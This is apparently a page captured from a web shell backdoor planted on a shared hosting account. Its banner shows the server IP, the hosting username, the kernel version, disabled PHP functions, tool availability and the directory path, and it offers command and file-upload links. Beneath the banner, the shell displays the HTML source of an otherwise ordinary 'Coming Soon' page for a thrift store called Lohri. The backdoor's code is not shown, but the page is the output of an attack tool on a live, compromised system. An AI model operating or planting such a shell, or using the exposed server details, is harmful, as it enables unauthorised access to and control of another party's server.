|
Server IP : 217.21.85.138 / Your IP : 216.73.216.103 Web Server : LiteSpeed System : Linux in-mum-web906.main-hosting.eu 4.18.0-553.37.1.lve.el8.x86_64 #1 SMP Mon Feb 10 22:45:17 UTC 2025 x86_64 User : u915722082 ( 915722082) PHP Version : 7.4.33 Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail MySQL : OFF | cURL : ON | WGET : ON | Perl : OFF | Python : OFF Directory (0755) : /home/u915722082/public_html/rasi/../projects/ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Coming Soon - Lohri</title>
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css">
<link href="https://fonts.googleapis.com/css2?family=Lora:wght@400;500;600&display=swap" rel="stylesheet">
<link href="https://fonts.googleapis.com/css2?family=Playfair+Display:wght@400;500;600;700&display=swap" rel="stylesheet">
<style>
* {
margin: 0;
padding: 0;
box-sizing: border-box;
}
body {
font-family: 'Arial', sans-serif;
height: 100vh;
width: 100vw;
display: flex;
flex-direction: column;
justify-content: center;
align-items: center;
background-image: url('assets/ChatGPT Image Jan 13, 2026, 06_09_27 PM.png');
background-size: cover;
background-position: center;
background-repeat: no-repeat;
position: relative;
overflow: hidden;
}
body::before {
content: '';
position: absolute;
top: 0;
left: 0;
right: 0;
bottom: 0;
background-color: rgba(255, 255, 255, 0.7);
z-index: 1;
}
.logo {
position: absolute;
top: 40px;
left: 50%;
transform: translateX(-50%);
z-index: 10;
}
.logo-text {
font-size: 24px;
letter-spacing: 4px;
color: #8b7355;
font-weight: 700;
text-transform: uppercase;
}
.container {
position: relative;
z-index: 10;
text-align: center;
padding: 40px;
max-width: 700px;
}
h1 {
font-size: 60px;
color: #2c2c2c;
margin-bottom: 30px;
font-weight: 400;
letter-spacing: 1px;
line-height: 1.2;
text-transform: uppercase;
}
.subtitle {
font-size: 18px;
color: #a89985;
margin-bottom: 40px;
font-weight: 400;
line-height: 1.8;
tezxt
}
.notify-btn {
background-color: #000000;
color: #ffffff;
border: none;
padding: 15px 45px;
font-size: 14px;
letter-spacing: 3px;
text-transform: uppercase;
cursor: pointer;
transition: all 0.3s ease;
font-weight: 600;
}
.notify-btn:hover {
background-color: #333333;
transform: translateY(-2px);
}
.footer {
position: absolute;
bottom: 40px;
text-align: center;
z-index: 10;
}
.footer-text {
font-size: 11px;
color: #888888;
margin-bottom: 15px;
line-height: 1.6;
}
.social-links {
display: flex;
justify-content: center;
gap: 15px;
}
.social-icon {
color: #666666;
text-decoration: none;
font-size: 18px;
transition: color 0.3s ease;
width: 35px;
height: 35px;
display: flex;
align-items: center;
justify-content: center;
}
.social-icon:hover {
color: #000000;
}
@media (max-width: 768px) {
h1 {
font-size: 40px;
letter-spacing: 8px;
}
.subtitle {
font-size: 14px;
}
.notify-btn {
padding: 12px 35px;
font-size: 10px;
}
.logo {
top: 30px;
}
}
</style>
</head>
<body>
<div class="logo">
<div class="logo-text">Lohri</div>
</div>
<div class="container">
<h1>Launching<br>soon!</h1>
<p class="subtitle">
We're curating a unique collection of pre-loved treasures.<br>
Your sustainable thrift store is launching soon. Subscribe to be notified.
</p>
<button class="notify-btn" onclick="notifyMe()">NOTIFY ME</button>
</div>
<div class="footer">
<div class="footer-text">
Website by Lohri<br>
© 2025. All Rights Reserved.
</div>
<div class="social-links">
<a href="#" class="social-icon"><i class="fab fa-facebook-f"></i></a>
<a href="#" class="social-icon"><i class="fab fa-instagram"></i></a>
</div>
</div>
<script>
function notifyMe() {
const email = prompt('Enter your email to be notified:');
if (email && email.includes('@')) {
alert('Thank you! We\'ll notify you when we launch.');
} else if (email) {
alert('Please enter a valid email address.');
}
}
</script>
</body>
</html>